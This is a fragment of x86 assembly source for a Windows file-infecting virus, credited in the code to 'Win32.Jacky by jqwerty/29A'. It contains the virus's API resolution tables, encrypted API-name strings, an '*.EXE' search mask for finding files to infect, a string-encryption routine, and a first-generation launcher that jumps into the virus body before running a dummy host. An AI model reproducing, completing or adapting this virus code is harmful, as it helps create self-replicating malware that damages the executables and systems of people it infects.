ddFindNextFileA dd ?
ddFindClose dd ?
ddSetFileAttributesA dd ?
ddSetFilePointer dd ?
ddSetEndOfFile dd ?
ddSetFileTime dd ?
v_stringz: ;the API names used by the virus are decrypted here
vszKernel32 db 'KERNEL32',0
vszGetModuleHandleA db 'GetModuleHandleA',0
vszGetProcAddress db 'GetProcAddress',0
EXE_filez db '*.EXE',0 ;the file mask
FunctionNamez:
vszCreateFileA db 'CreateFileA',0
vszCreateFileMappingA db 'CreateFileMappingA',0
vszCloseHandle db 'CloseHandle',0
vszUnmapViewOfFile db 'UnmapViewOfFile',0
vszMapViewOfFile db 'MapViewOfFile',0
vszFindFirstFileA db 'FindFirstFileA',0
vszFindNextFileA db 'FindNextFileA',0
vszFindClose db 'FindClose',0
vszSetFileAttributesA db 'SetFileAttributesA',0
vszSetFilePointer db 'SetFilePointer',0
vszSetEndOfFile db 'SetEndOfFile',0
vszSetFileTime db 'SetFileTime',0
EndOfFunctionNames db 0
align 4
FindData WIN32_FIND_DATA ?
virtual_end:
first_generation: ;this routine will be called only once from the first
;generation sample, it simply initializes some variables
;needed in the very first run.
jumps
push NULL
call GetModuleHandleA
test eax,eax
jz exit_host
xchg ecx,eax
call here
here: pop ebx
mov eax,ebx
sub eax,here - v_start
sub eax,ecx
neg eax
mov [ebx + delta_host - here],eax ;set delta host value
mov eax,ebx
sub eax,here - host
sub eax,ecx
neg eax
mov [ebx + phost_start_rva - here],eax ;set pointer to
;host's base adress
mov eax,[ebx + pfnGMH - here]
.if word ptr [eax] == 25FFh ; JMP [nnnnnnnn]
mov eax,[eax + 2]
.endif
sub eax,ecx
mov [ebx + ddGetModuleHandleA - here],eax ;set GetModuleHandleA
;RVA pointer
mov eax,[ebx + pfnGPA - here]
.if word ptr [eax] == 25FFh ; JMP [nnnnnnnn]
mov eax,[eax + 2]
.endif
sub eax,ecx
mov [ebx + ddGetProcAddress - here],eax ;set GetProcAddress
;RVA pointer
pushad ;encrypt unencrypted API namez and other
;stringz
cld
mov ecx,ve_string_size
lea esi,[ebx + ve_stringz - here]
mov edi,esi
call crypt_back
popad
jmp v_start ;ok, here we go.. jump to virus start..
crypt_back: ;encryption routine
lodsb
not al
ror al,cl
stosb
loop crypt_back
ret
pfnGMH dd offset GetModuleHandleA
pfnGPA dd offset GetProcAddress
;Host code starts here
extrn MessageBoxA: proc
extrn ExitProcess: proc
host: ;here begins the original host code
;Display Message box
push MB_OK
@pushsz "(c) Win32.Jacky by jqwerty/29A"
@pushsz "First generation sample"
push NULL
call MessageBoxA
;Exit host
exit_host:
push 0
call ExitProcess
end first_generation
